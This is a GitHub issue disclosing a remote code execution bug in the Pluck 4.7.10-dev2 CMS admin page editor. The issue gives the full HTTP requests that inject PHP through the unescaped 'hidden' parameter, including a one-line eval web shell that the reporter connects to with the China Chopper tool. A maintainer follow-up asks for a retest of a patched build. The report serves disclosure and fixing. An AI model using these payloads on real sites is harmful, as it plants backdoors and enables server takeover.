pluck-cms / pluck

Central repo for pluck cms

Home Page:http://www.pluck-cms.org

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability when creating a new web page

SecurityCN opened this issue · comments

Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability when creating a new web page

Vulnerability location:
data\inc\functions.admin.php 531-535 line
2019-10-21-15-39-25

Saves the hidden parameter passed by the POST request to php, but does not escape the special character (') in the value, which can directly close the php syntax remote execution command, such as phpinfo(), eval(), etc.

Demo:
After the installation is successful, go to the management background.Create a new page, enter a title and content Select "Show webpage",submit the request and then grab the request packet to modify the value of the hidden parameter to "no"; phpinfo();'"
2019-10-21-15-29-59

POST /pluck-4.7.10-dev2/admin.php?action=editpage HTTP/1.1
Host: 192.168.80.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.1/pluck-4.7.10-dev2/admin.php?action=editpage
Cookie: PHPSESSID=b01p8o9n85qbjq6f1tj50anlp3
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 131

title=aaaa&seo_name=&content=%3Cp%3Eaaaa%3C%2Fp%3E&description=&keywords=&hidden=no';phpinfo();'&sub_page=&theme=default&save=%E5%82%A8%E5%AD%98

2019-10-21-15-22-36

2019-10-21-15-23-39

http://192.168.80.1/pluck-4.7.10-dev2/?file=aaaa
2019-10-21-15-24-43

Write a sentence Trojan

POST /pluck-4.7.10-dev2/admin.php?action=editpage HTTP/1.1
Host: 192.168.80.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.1/pluck-4.7.10-dev2/admin.php?action=editpage
Cookie: PHPSESSID=b01p8o9n85qbjq6f1tj50anlp3
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 144

title=bbbb&seo_name=&content=%3Cp%3Ebbbb%3C%2Fp%3E&description=&keywords=&hidden=no';@eval($_POST[b]);'&sub_page=&theme=default&save=%E5%82%A8%E5%AD%98

Use chopper connection
2019-10-21-15-27-59

Could you please test the attached version?

pluck-4.7.10-dev3.tar.gz

Have you retested with the latest dev version?